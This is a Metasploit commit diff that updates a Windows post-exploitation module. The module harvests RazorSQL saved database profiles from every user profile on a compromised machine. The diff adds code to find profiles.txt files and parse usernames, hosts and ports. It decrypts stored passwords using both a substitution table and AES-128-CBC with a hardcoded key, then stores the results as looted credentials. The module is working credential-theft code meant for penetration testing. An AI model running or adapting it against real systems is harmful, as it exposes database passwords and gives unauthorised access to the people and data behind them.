Land rapid7#5468, @wchen-r7's updates razorsql to use the new creds api

jvazquez-r7 · jvazquez-r7 · commit f5b9be7814c4 · 2015-06-16T17:51:18.000-05:00
* Also fixes rapid7#5469
diff --git a/modules/post/windows/gather/credentials/razorsql.rb b/modules/post/windows/gather/credentials/razorsql.rb
@@ -6,9 +6,11 @@
 require 'msf/core'
 require 'rex'
 require 'msf/core/auxiliary/report'
+require 'openssl'
 
 class Metasploit3 < Msf::Post
 
+  include Msf::Post::File
   include Msf::Auxiliary::Report
   include Msf::Post::Windows::UserProfiles
 
@@ -30,6 +32,48 @@ def initialize(info={})
     ))
   end
 
+  def get_profiles
+    profiles = []
+    grab_user_profiles.each do |user|
+      next unless user['ProfileDir']
+      ['.razorsql\\data\\profiles.txt', 'AppData\Roaming\RazorSQL\data\profiles.txt'].each do |profile_path|
+        file = "#{user['ProfileDir']}\\#{profile_path}"
+        profiles << file if file?(file)
+      end
+    end
+
+    profiles
+  end
+
+
+  def report_cred(opts)
+    service_data = {
+      address: opts[:ip],
+      port: opts[:port],
+      service_name: opts[:service_name],
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      module_fullname: fullname,
+      post_reference_name: self.refname,
+      session_id: session_db_id,
+      origin_type: :session,
+      private_data: opts[:password],
+      private_type: :password,
+      username: opts[:user]
+    }.merge(service_data)
+
+    login_data = {
+      core: create_credential(credential_data),
+      status: Metasploit::Model::Login::Status::UNTRIED,
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+
+
   def run
     print_status("Checking All Users...")
     creds_tbl = Rex::Ui::Text::Table.new(
@@ -47,19 +91,17 @@ def run
         ]
     )
 
-    grab_user_profiles().each do |user|
-      next if user['ProfileDir'] == nil
-      file= user['ProfileDir'] + "\\.razorsql\\data\\profiles.txt"
-      content = get_content(file)
-      if content and not content.empty?
-        creds = parse_content(creds_tbl, content, user['UserName'])
-        creds.each do |c|
-          creds_tbl << c
-        end
+    get_profiles.each do |profile_path|
+      content = get_content(profile_path)
+      next if content.blank?
+      parse_content(creds_tbl, content).each do |cred|
+        creds_tbl << cred
       end
     end
 
-    if not creds_tbl.rows.empty?
+    if creds_tbl.rows.empty?
+      print_status("No creds collected.")
+    else
       path = store_loot(
         'razor.user.creds',
         'text/csv',
@@ -70,8 +112,6 @@ def run
       )
       print_line(creds_tbl.to_s)
       print_status("User credentials stored in: #{path}")
-    else
-      print_error("No data collected")
     end
   end
 
@@ -86,9 +126,8 @@ def get_content(file)
     return content
   end
 
-  def parse_content(table, content, username)
+  def parse_content(table, content)
     creds = []
-    print_line("Account: #{username}\n")
     content = content.split(/\(\(Z~\]/)
     content.each do |db|
       database = (db.scan(/database=(.*)/).flatten[0] || '').strip
@@ -100,19 +139,28 @@ def parse_content(table, content, username)
       pass     = (db.scan(/password=(.*)/).flatten[0] ||'').strip
 
       # Decrypt if there's a password
-      pass = decrypt(pass) if not pass.empty?
+      unless pass.blank?
+        if pass =~ /\{\{\{VFW(.*)!\^\*#\$RIG/
+          decrypted_pass = decrypt_v2($1)
+        else
+          decrypted_pass = decrypt(pass)
+        end
+      end
+
+      pass = decrypted_pass ? decrypted_pass : pass
 
       # Store data
       creds << [user, pass, type, host, port, dbname, database]
 
-      # Reort auth info while dumping data
-      report_auth_info(
-        :host  => host,
-        :port  => port,
-        :sname => database,
-        :user  => user,
-        :pass  => pass,
-        :type  => 'password'
+      # Don't report if there's nothing to report
+      next if user.blank? && pass.blank?
+
+      report_cred(
+        ip: rhost,
+        port: port.to_i,
+        service_name: database,
+        user: user,
+        password: pass
       )
     end
 
@@ -140,12 +188,30 @@ def decrypt( encrypted_password )
       "a" => "<" , "Y" => ">" , "'" => "'" , "^" => "^" , "{" => "{" ,
       "}" => "}" , "[" => "[" , "]" => "]" , "~" => "~" , "`" => "`"
     }
-    password=''
+    password = ''
     for letter in encrypted_password.chomp.each_char
-      password << magic_key[letter]
+      char = magic_key[letter]
+
+      # If there's a nil, it indicates our decryption method does not work for this version.
+      return nil if char.nil?
+
+      password << char
     end
-    return password
+
+    password
   end
+
+  def decrypt_v2(encrypted)
+    enc = Rex::Text.decode_base64(encrypted)
+    key = Rex::Text.decode_base64('LAEGCx0gKU0BAQICCQklKQ==')
+
+    aes = OpenSSL::Cipher.new('AES-128-CBC')
+    aes.decrypt
+    aes.key = key
+
+    aes.update(enc) + aes.final
+  end
+
 end
 
 =begin
